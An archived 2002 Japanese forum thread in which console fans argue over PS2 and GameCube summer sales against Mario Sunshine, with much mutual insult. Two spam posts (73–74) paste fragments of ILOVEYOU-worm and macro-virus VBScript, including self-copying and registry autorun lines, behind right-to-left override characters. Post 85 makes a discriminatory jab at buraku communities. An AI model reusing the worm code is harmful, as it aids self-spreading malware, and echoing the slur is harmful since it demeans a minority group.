5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

SCE陣営 マリオサンシャイン完全撃退体制完了part2

1 :名無しさん必死だな:02/08/01 00:55 ID:63Pa5LBI
6月20日 ポポロクロイス物語〜はじまりの冒険〜
6月27日 -
7月4日 ふたりのファンタビジョン
7月11日 ぼくのなつやすみ2
7月18日 サルゲッチュ2
7月25日 GTC2001ジュネーブ

前スレ
http://game.2ch.net/ghard/kako/1023/10237/1023789484.html

2 :名無しさん必死だな:02/08/01 00:56 ID:A2.bpBsE
良スレ

3 :名無しさん必死だな:02/08/01 00:56 ID:0.0.zUeA
2っひっひ

4 : :02/08/01 00:57 ID:5TjMNxig
知らないゲームのほうが多いんですけど?

5 :名無しさん必死だな:02/08/01 00:58 ID:2hyUw/YQ
GTもうでてたの!?

6 :名無しさん必死だな:02/08/01 00:58 ID:0.0.zUeA
GTCってなに?
とりあえず2の取得に失敗。

7 :名無しさん必死だな:02/08/01 00:59 ID:zZW4H6Rw
ぼくなつ2はヒットしたね。

8 :名無しさん必死だな:02/08/01 01:00 ID:P31RAN4k


      過ぎ去った夏の思ひで

9 :名無しさん必死だな:02/08/01 01:02 ID:PSvuVBBQ
GTCって出てたのか
影が薄すぎて気付かない

10 :名無しさん必死だな:02/08/01 01:03 ID:eZcRTMDA
売上/出来
△/× ポポロクロイス物語〜はじまりの冒険〜
6月27日 -
×/? ふたりのファンタビジョン
◎/? ぼくのなつやすみ2
○/? サルゲッチュ2
?/? GTC2001ジュネーブ

11 :名無しさん必死だな:02/08/01 01:03 ID:zfmdVyic
GTCジュネーブは日本では発売しない

12 :名無しさん必死だな:02/08/01 01:03 ID:PSvuVBBQ
出してくれたら買うのに

13 :名無しさん必死だな:02/08/01 01:05 ID:DDPHIe0g
欧州のランキングで1位だった>GTC

14 :名無しさん必死だな:02/08/01 01:06 ID:PSvuVBBQ
GT乱発でブランド落ちるのが怖いのかな

15 :ごんちゃん:02/08/01 01:06 ID:NReniX7M
6月20日 ポポロクロイス物語〜はじまりの冒険〜 3000円
6月27日 -
7月4日 ふたりのファンタビジョン 2000円
7月11日 ぼくのなつやすみ2 4500円
7月18日 サルゲッチュ2 3000円
7月25日 GTC2001ジュネーブ 4000円

こんなもんかな?

16 :名無しさん必死だな:02/08/01 01:07 ID:npYN40J.
・・・?
とりあえずGTCは日本でそうにないのでいい加減省いて下さい

17 :名無しさん必死だな:02/08/01 01:12 ID:UFojod16
もう夏は終わりだよ

18 :名無しさん必死だな:02/08/01 03:41 ID:9E8pg09I
撃退しなくても、マリオ自滅だったね。
PS2とGC両方もってる身としては、もうちょっと任天堂は誠実に頑張ってもらいたい。

19 :名無しさん必死だな:02/08/01 03:44 ID:8uc0vkeA
284 名前:オリコンウィークリー :02/08/01 03:34 ID:jmNWlZL.
1 − GC スーパーマリオサンシャイン アクション 任天堂 2002/07/19 38043
2 − PS2 かまいたちの夜2 〜監獄島のわらべ唄〜 サウンドノベル チュンソフト 2002/07/18 17833
3 − PS2 実況パワフルプロ野球9 野球 コナミ 2002/07/18 17662
4 − PS2 実戦パチスロ必勝法! アラジンA 実機パチスロシミュレーション サミー 2002/07/18 7771
5 − PS2 サルゲッチュ2 サルつかまえアクション ソニー・コンピュータエンタテインメント 2002/07/18 6718

SCE陣営、惨敗

20 :名無しさん必死だな:02/08/01 03:55 ID:6LAaWU8k
みんな惨敗って感じもしないでもねーがな・・・。
夏は売れてねーんだな

21 :名無しさん必死だな:02/08/01 03:58 ID:9E8pg09I
天下のマリオが、かまいたちに勝った程度で喜んでるんじゃ・・・
世界で一番有名なゲームなんだから、志を高く持って欲しい。

22 :名無しさん必死だな:02/08/01 04:00 ID:zfmdVyic
かまいたちも一応ミリオンソフトなんですけど

23 :名無しさん必死だな:02/08/01 04:00 ID:6LAaWU8k
「かまいたち2、ミリオン!」とか言ってた信者も相当痛かったけどな・・・。

24 :名無しさん必死だな:02/08/01 04:13 ID:h0U1N86g
GC 42411(35%)
PS2 68494(56.6%)
GBA 7522(6.2%)
DC 1422 (1.1%)
GB 1206(0.9%)
総121055

25 :名無しさん必死だな:02/08/01 04:14 ID:PSvuVBBQ
XBOXが見えません

26 :名無しさん必死だな:02/08/01 04:17 ID:h0U1N86g
35%+56.6%+6.2%+1.1%+0.9%=99.8%
からして多分
0.2% の中にXBOXが・・・・

27 :名無しさん必死だな:02/08/01 04:22 ID:ljjN2PlY
GCすごいじゃん。マリサン立派にハード牽引してるんじゃない?

28 :名無しさん必死だな:02/08/01 04:26 ID:drRIAGkQ
>>25
GC 42411(35%)
PS2 68494(56.6%)
GBA 7522(6.2%)
DC 1422 (1.1%)
GB 1206(0.9%)
を見る限り
35.0
56.6
 6.2
 1.1
 0.9
-----
 0.2

29 :名無しさん必死だな:02/08/01 04:58 ID:KkroWWe.
0.2%はスワンクリスタルだろ、普通に考えて。

30 :名無しさん必死だな:02/08/01 05:23 ID:tuioFR1M
どれも30万も行ってないんだが。

31 :名無しさん必死だな:02/08/01 08:51 ID:4ALsBBsQ
ふたりのファンタビジョンって何だ?

32 :名無しさん必死だな:02/08/01 08:52 ID:ljjN2PlY
>>31
花火ゲー

33 :名無しさん必死だな:02/08/01 08:54 ID:gRZRTCAI
ふたりってカプール使ったCM打つのか

34 :名無しさん必死だな:02/08/01 09:00 ID:ljjN2PlY
>>33
みたことないのか?CM
カプールばりばり使いまくりだよ。

35 :名無しさん必死だな:02/08/01 09:03 ID:npYN40J.
ジャンルはパズル
ファンタビジョンが対戦できるようになっただけです

36 :名無しさん必死だな:02/08/01 09:06 ID:ZZhn9fnQ
彼氏と彼女のラブ*ゲーム
「ふたりのファンタビジョン」みたいなソフトを「ラブ・ゲーム」って
呼ぶコトにしませんか?
いきなりですけど。今以上に広く老若男女にゲームを普及させるためには、
そろそろ決断すべきだと思いますね。
http://www.scej.jp/soft/2fantavision/

37 :◆iiSEGA..:02/08/01 09:09 ID:U7yTi8no
ふたりのファンタビジョンのCMは、ソニーのゲームに対する考え方を如実に表していて興味深い。
結局、あのふたりはゲームやらずに何してるんだろね?

38 :名無しさん必死だな:02/08/01 09:21 ID:G.Z2lb8w
ポポロ+ぼく夏+サル=43万5532本
マリサン=30万8765本

SCEの圧勝でした

39 :名無しさん必死だな:02/08/01 09:24 ID:EnggnooA
結局100万本クラスのソフトって何だったんだろう。
しかしハードの売り上げは止まらんね。
いいのかこれで・・・。

40 :名無しさん必死だな:02/08/01 09:33 ID:7cRTrF8w
>>38
ちょっと笑ったが、ソニーは任天堂の1/3の実力って事か。

41 :名無しさん必死だな:02/08/01 09:36 ID:8uc0vkeA
1/3もあるかよ

42 :名無しさん必死だな:02/08/01 09:38 ID:rr/0.jMw
かまいたちは酷かったな。

43 :名無しさん必死だな:02/08/01 09:40 ID:w3DEjjRQ
凄いね。1の挙げた全部と比較しても、マリサンの方が魅力的ってのが。

44 :名無しさん必死だな:02/08/01 10:23 ID:CxAg/y9A
>>43
痛い・・・
21を音読してみろ。

45 :名無しさん必死だな:02/08/01 10:30 ID:ljjN2PlY
>>38
毛利の三本の矢を思い出したよ…
なんの脈絡もないが…

46 :名無しさん必死だな:02/08/01 10:33 ID:7r3E21oU
>>44
>>21も充分痛いだろ。

47 :名無しさん必死だな:02/08/03 12:08 ID:VQbYya0o
7月で終わりなのか?

48 :名無しさん必死だな:02/08/03 12:13 ID:sZrkRnzw
1であげられたソフトはことごとくマリサンの前に討ち死に…

49 :( ○ ´ ー ` ○ ) はスバラシイ:02/08/03 12:16 ID:xvHm/EHo
どちらかと言うとマリサンと関係なく自滅してる気も。。

50 :名無しさん必死だな:02/08/03 12:18 ID:59m9Jb9U
GTにしてもウイイレにしてもそうだけど、見たくないものを見ないで勝てるとこ
ろだけで(それも看板ソフトを肴に)喜んでるというのはどうかと。
マリオってそんな程度の低いブランドだったのか?

51 :名無しさん必死だな:02/08/03 12:22 ID:sZrkRnzw
>>50
裏を返せば>>1のソフトは程度が低いと
あ〜あ認めちゃったねw

52 :名無しさん必死だな:02/08/03 12:24 ID:59m9Jb9U
認めちゃったね・・って認めてなきゃ書くわけねーだろ(w
誰でも彼でも自分と同じ原理主義のバカ信者だと思ってんのか?

53 :名無しさん必死だな:02/08/03 12:31 ID:cboRY.5c
>>1
1のソフトが脂肪かどうかはさておき予想より売り上げがいい。
近頃のソニコンの平均売り上げとしては。
発売されてないジュネーブを除くと75%の確立で10万本突破している。

54 :( ○ ´ ー ` ○ ) はスバラシイ:02/08/03 12:31 ID:xvHm/EHo
ファンタビジョンは騙り出川さんじゃないとマンセーできないんじゃないかな、さすがに。

55 :名無しさん必死だな:02/08/03 12:34 ID:59m9Jb9U
ファンタビジョン単体なら無理すればできないことは無いけど、「ふたりの」は
ちょっと・・・(w

56 :名無しさん必死だな:02/08/03 12:35 ID:sZrkRnzw
>>52
少なくとも貴方に限っては
人の発言の言葉尻捕まえて信者認定する時点でどこかの宗教の方かとw

57 :名無しさん必死だな:02/08/03 12:36 ID:VQbYya0o
38 名前: 名無しさん必死だな 投稿日: 02/07/12 20:45 ID:EpIIM2V.

サルゲッチュ2はハード普及数から考えても
映画の相乗効果を考えても圧倒的有利は間違いない。
佐伯がミリオン行くって言ってたのもサルゲッチュのことだし
これであの古臭いマンネリマリオに負けることは
どう考えてもありえない

58 :王大人:02/08/03 12:37 ID:sZrkRnzw
>>1
とりあえず
脂肪確認!

59 :名無しさん必死だな:02/08/03 12:38 ID:59m9Jb9U
>>56
誰か翻訳してください。

60 :名無しさん必死だな:02/08/03 12:42 ID:SYsG85K2
>>59 俺に任せろ。
訳:貴方はオウムです。

61 :名無しさん必死だな:02/08/03 12:43 ID:59m9Jb9U
ますますわからん(w

62 :名無しさん必死だな:02/08/03 12:48 ID:sZrkRnzw
>>60
爆笑w

63 :名無しさん必死だな:02/08/03 12:52 ID:59m9Jb9U
まあなんにせよ、十人十色を理解できないってのは信者発想を続けた結果
脳が硬化してるのは間違いないと思うんだが。否定すればsZrkRnzwは
単なるあおり豚ってことになる。

64 :名無しさん必死だな:02/08/03 13:04 ID:KwBdNHEc
こんなので対抗できると思った出川がバカなだけだな。

65 :名無しさん必死だな:02/08/03 13:08 ID:sZrkRnzw
あちらこちらで信者よばわりの異端諮問官気取りが
「十人十色」とは笑わせる

66 :名無しさん必死だな:02/08/03 13:09 ID:cboRY.5c
あれ?
今気づいたんだが、
ソニコン5本のソフトの合計は(ジュネーブ含む)
マリオサンシャインの売り上げ(現在40数万)より多いじゃないか!?
脂肪してないじゃん。

67 :名無しさん必死だな:02/08/03 13:14 ID:b/YTQxNw
ぼくなつ2とサル2足しただけでもマリサンとほぼ同数だからね
この2本をしっかり作ってマリサンにぶつけたSCEIはなかなかやるなと思った

68 :名無しさん必死だな:02/08/03 13:16 ID:JzUN/DMQ
じゃあ成功?
販売本数とか今後のマリオが売れつづける妄想抜きにして、
GCのハード普及を止められたなら成功だよな。

69 :名無しさん必死だな:02/08/03 13:17 ID:pdCN6jWg
>>66
>>38から読んでみたら

70 :名無しさん必死だな:02/08/14 23:08 ID:zpat8qf3
まだまだ!!!!

71 :名無しさん必死だな:02/08/14 23:11 ID:ELEjfyl3
なんともみっともない1000万台ハ−ドだな

72 :名無しさん必死だな:02/08/14 23:22 ID:+43SAtVU
ソニコンもサルゲ2並のソフトを三ヶ月に一本ペースで発売すれば
それなりにブランド構築できるんだろうけど
これから年末までに発売するソフトでまた評価がバンダイ並に
下げる事になるんだろうね

まぁ一本のソフトを3ヶ月から半年も放送してりゃ売れるのは当たり前?
みんゴル、GT、サルゲ2も今のところ2ヶ月放送してるな
マリオが早々にCM終了してんのに


73 :あひゃ ◆CTR8AHYA :02/08/14 23:24 ID:Xh1zH6zW
&rlo; http://wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
以上、ケン・コロスでした!  
&rlo; ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥
&rlo; ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥
&rlo; ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥

74 :あひゃ ◆CTR8AHYA :02/08/14 23:25 ID:Xh1zH6zW
&rlo; http://wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
以上、ケン・コロスでした!  
&rlo; ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥
&rlo; ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥
&rlo; ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ 

75 :名無しさん必死だな:02/08/14 23:26 ID:4XojptAD
マリサンの代わりにCM流してるミッキーも
売れるのは当たり前、、って売れてねー!

76 :名無しさん必死だな:02/08/14 23:27 ID:nEI/2EKh
撃退とまではいかないのぅ


77 :名無しさん必死だな:02/08/14 23:38 ID:eDpSrk0d
>>72
は?ぼくなつ、ジャックン、ICO、オトスタツ、監視者などは良ゲー。
ぼくなつは30万越え、ジャックンは25万本、ICOは世界で50万本ですよ。
あと今年後半はダーククロニクルがありますよ。

78 :閑人 ◆ZELDAFHI :02/08/14 23:39 ID:uEKtHXbT
誰も買ってないから何とでも言えるね

79 :名無しさん必死だな:02/08/14 23:43 ID:vthmniEc
ある意味セガ信者に似てるね

80 :名無しさん必死だな:02/08/14 23:47 ID:wPdePJ8l
妊娠敗走(w

81 :名無しさん必死だな:02/08/14 23:54 ID:b6xCHYog
>>80
(wだって。何を言っているのだろうか。

82 :名無しさん必死だな:02/08/15 00:04 ID:4h8DDm5F
>>72
>マリオが早々にCM終了してんのに

ニンテンのまぬけさを象徴してるね(w

83 :名無しさん必死だな:02/08/15 00:11 ID:iIRwyU+h
ホント何でミッキーなんて流してんだろ? 馬鹿だね・・・

84 :名無しさん必死だな:02/08/15 11:51 ID:dD0pM8oE
CM批判をあっさりと黙らせた任天堂の新CM

85 :名無しさん必死だな:02/08/18 21:50 ID:HtoGch9n
マリオサンシャインは笑えた!
1フレームごとにカウントしてたのってオレだけ?
(よっしゃー2フレーム突破!よーし次は3フレーム突破しろーって)
でも結局は30フレームしか出てねえんだよね。全然、騒ぐほどじゃないし。
マリオサンシャインは笑えた。まじで
ゲーハー板で知って、手を叩いてわらったなぁ。
おまえらが30fpsのマリオやってる間、家で60fspのサルゲッチュ2やってた
アホだなー妊娠はって思いながら
わざわざGC買って検証しようかと思ったよ。
でもマリオサンシャインのおかげで何かしらの利益を得た人だっている訳だし
結果的には良かったんじゃないかな。
たしか任天堂が分納で出荷を渋っていたけどさ、
京都って部○が多いからそのまま全滅させたかったんだよね。
今でもGCだけで粘ってる妊娠がいるらしいけど、
せこいんだよ!奴らは貧乏なんだよね。むかつく。
ところで妊娠ってマリサンやってる間トイレどうしてたの?
もしかしておまる?汚ねぇなぁー。
どちらにしろ30fspのマリサンの映像はまさにデスクリムゾンのようで壮観だった!
気持ちの良い夕刻でした


86 :名無しさん必死だな:02/08/19 02:02 ID:xFIVECYu
>>85
コピペにもセンスなさすぎ…。哀れな出川だな

17 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)